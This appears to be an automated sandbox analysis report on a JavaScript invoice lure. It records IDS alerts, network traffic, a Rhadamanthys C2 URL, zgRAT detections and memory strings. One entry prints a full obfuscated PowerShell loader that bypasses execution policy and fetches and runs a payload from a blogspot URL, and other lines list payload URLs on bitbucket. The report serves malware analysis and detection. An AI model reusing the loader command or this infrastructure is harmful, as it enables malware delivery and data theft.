2025-01-08T09:08:17.227258+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	61171	142.250.185.129	443	TCP
2025-01-08T09:08:18.323467+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	61180	142.250.185.129	443	TCP
2025-01-08T09:08:19.489633+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	61187	185.166.143.49	443	TCP
2025-01-08T09:08:34.817042+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	61292	142.250.185.129	443	TCP
2025-01-08T09:08:35.921864+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	61304	142.250.185.129	443	TCP
2025-01-08T09:08:37.076602+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	61311	185.166.143.49	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2426414077.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf"}

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:61171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:61187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:61292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:61311 version: TLS 1.2

Source:	Binary string: wkernel32.pdb source: svchost.exe, 00000011.00000003.2429390168.0000000004960000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2429512001.0000000004C80000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: svchost.exe, 00000011.00000003.2429816528.0000000004C00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2430036073.0000000004E20000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: svchost.exe, 00000011.00000003.2420835359.0000000004C00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2424695358.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: svchost.exe, 00000011.00000003.2426101263.0000000004C00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2426625757.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: svchost.exe, 00000011.00000003.2420835359.0000000004C00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2424695358.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: svchost.exe, 00000011.00000003.2426101263.0000000004C00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2426625757.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000011.00000003.2429816528.0000000004C00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2430036073.0000000004E20000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: svchost.exe, 00000011.00000003.2429390168.0000000004960000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2429512001.0000000004C80000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_87e30ac2-281e-4c43-b7e2-7c70f7b43b8c\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_85461118-d854-48b7-a79c-64e094445915\

Source: invoice-1623385214 pdf.js	Return value : ['powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::T']	Go to definition
Source: invoice-1623385214 pdf.js	Argument value : ['powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::T', '"powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::']	Go to definition
Source: invoice-1623385214 pdf.js	Return value : ['powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::T', '"powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::']	Go to definition
Source: invoice-1623385214 pdf.js	Return value : ['powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::T', '"powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::']	Go to definition

Source: Network traffic	Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.2.4:49731 -> 172.217.16.193:443
Source: Network traffic	Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.2.4:61180 -> 142.250.185.129:443
Source: Network traffic	Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.2.4:61304 -> 142.250.185.129:443

Source: Joe Sandbox View	IP Address: 185.166.143.49 185.166.143.49
Source: Joe Sandbox View	IP Address: 185.166.143.50 185.166.143.50

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 185.166.143.50:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 172.217.16.193:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 172.217.16.193:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 172.217.16.193:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:61171 -> 142.250.185.129:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:61187 -> 185.166.143.49:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:61180 -> 142.250.185.129:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61180 -> 142.250.185.129:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:61304 -> 142.250.185.129:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61304 -> 142.250.185.129:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:61292 -> 142.250.185.129:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:61311 -> 185.166.143.49:443

Source: global traffic	HTTP traffic detected: GET /////lund.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7janmain.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7janmain.blogspot.com
Source: global traffic	HTTP traffic detected: GET /!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET ///////nigger.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.com
Source: global traffic	HTTP traffic detected: GET /!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET ///////nigger.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.com
Source: global traffic	HTTP traffic detected: GET /!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bitbucket.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.19
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.19
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: 7janmain.blogspot.com
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: hot7jan.blogspot.com

Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crt0
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crl0S
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crl0=
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000001.00000002.2672412886.0000018A21343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2672412886.0000018A214B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2672412886.0000018A21121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3033665409.0000023EC24E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2672412886.0000018A214B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.2672412886.0000018A21343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 00000011.00000002.2444188826.000000000016C000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2418045531.000000000071D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf
Source: svchost.exe, 00000012.00000002.2418045531.000000000071D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf?
Source: svchost.exe, 00000011.00000002.2444188826.000000000016C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlfx
Source: powershell.exe, 00000001.00000002.2672412886.0000018A21343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://7janmain.blogspot.com
Source: powershell.exe, 00000001.00000002.2672412886.0000018A21343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://7janmain.blogspot.com/////lund.pdf
Source: powershell.exe, 00000001.00000002.2669194334.0000018A1F1F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2670611629.0000018A20C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://7janmain.blogspot.com/////lund.pdf);Start-Sleep
Source: powershell.exe, 00000001.00000002.2670333982.0000018A1F410000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2669194334.0000018A1F20F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2669194334.0000018A1F27C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2669194334.0000018A1F1F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://7janmain.blogspot.com/////lund.pdf);Start-Sleep-Seconds5;
Source: powershell.exe, 00000001.00000002.2670611629.0000018A20C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://7janmain.blogspot.com/////lund.pdf);Start-Sleep-Seconds5;Qiz.A
Source: powershell.exe, 00000001.00000002.2672412886.0000018A21343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://7janmain.blogspot.com/////lund.pdfx._
Source: powershell.exe, 00000001.00000002.2672412886.0000018A21121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3033665409.0000023EC24E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.2672412886.0000018A214B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC28C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: powershell.exe, 00000001.00000002.2672412886.0000018A214B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3033665409.0000023EC28AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: powershell.exe, 00000001.00000002.2672412886.0000018A214B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2672412886.0000018A214B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3033665409.0000023EC2854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3033665409.0000023EC285C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC28C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC28C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: powershell.exe, 00000001.00000002.2672412886.0000018A21343000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC2703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC2703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com///////nigger.pdf
Source: mshta.exe, 0000001D.00000003.2685162893.000002B6CDA30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com///////nigger.pdf)
Source: powershell.exe, 0000001B.00000002.3024354537.0000023EC0696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com///////nigger.pdf)0Zn
Source: powershell.exe, 00000001.00000002.2843464890.0000018A31191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC28C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC28C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001B.00000002.3033665409.0000023EC28C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3033665409.0000023EC286C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61180
Source: unknown	Network traffic detected: HTTP traffic on port 61187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 61171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61187
Source: unknown	Network traffic detected: HTTP traffic on port 61311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61311
Source: unknown	Network traffic detected: HTTP traffic on port 61292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 61180 -> 443

Source: Yara match	File source: 17.3.svchost.exe.4e20000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.svchost.exe.4c00000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.2429816528.0000000004C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2430036073.0000000004E20000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

Source: 1.2.powershell.exe.18a31d882e8.2.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 1.2.powershell.exe.18a31d882e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A651A4 NtQueryInformationProcess,	7_2_05A651A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A6B28B NtQueryInformationProcess,	7_2_05A6B28B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A654E0 NtQuerySystemInformation,NtQuerySystemInformation,RtlGetVersion,lstrcmpiW,CloseHandle,	7_2_05A654E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A67754 NtQuerySystemInformation,malloc,NtQuerySystemInformation,K32GetProcessImageFileNameW,	7_2_05A67754
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A688F1 NtQueryInformationProcess,	7_2_05A688F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_012EA048	6_2_012EA048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_012EA038	6_2_012EA038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_012E5309	6_2_012E5309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_012E5D90	6_2_012E5D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_012E5DC0	6_2_012E5DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_05E6A070	6_2_05E6A070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE22DC	7_2_02DE22DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2AC8	7_2_02DE2AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE22FF	7_2_02DE22FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3AEA	7_2_02DE3AEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2AEB	7_2_02DE2AEB
